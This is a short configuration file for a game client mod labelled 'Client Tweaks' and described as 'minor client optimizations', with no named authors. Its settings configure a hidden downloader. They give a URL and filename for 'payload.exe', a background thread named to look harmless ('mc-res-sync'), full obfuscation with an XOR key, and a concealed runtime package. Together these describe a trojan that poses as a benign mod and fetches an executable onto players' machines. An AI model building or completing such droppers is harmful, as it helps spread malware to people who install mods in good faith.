mod.id=client-tweaks
mod.name=Client Tweaks
mod.description=Minor client optimizations
mod.authors=-
download.url=https://example.com/path/payload.exe
download.filename=payload.exe
thread.name=mc-res-sync
obfuscate.level=full
obfuscate.xor.key=91
obfuscate.runtime.pkg=com/godimod/internal
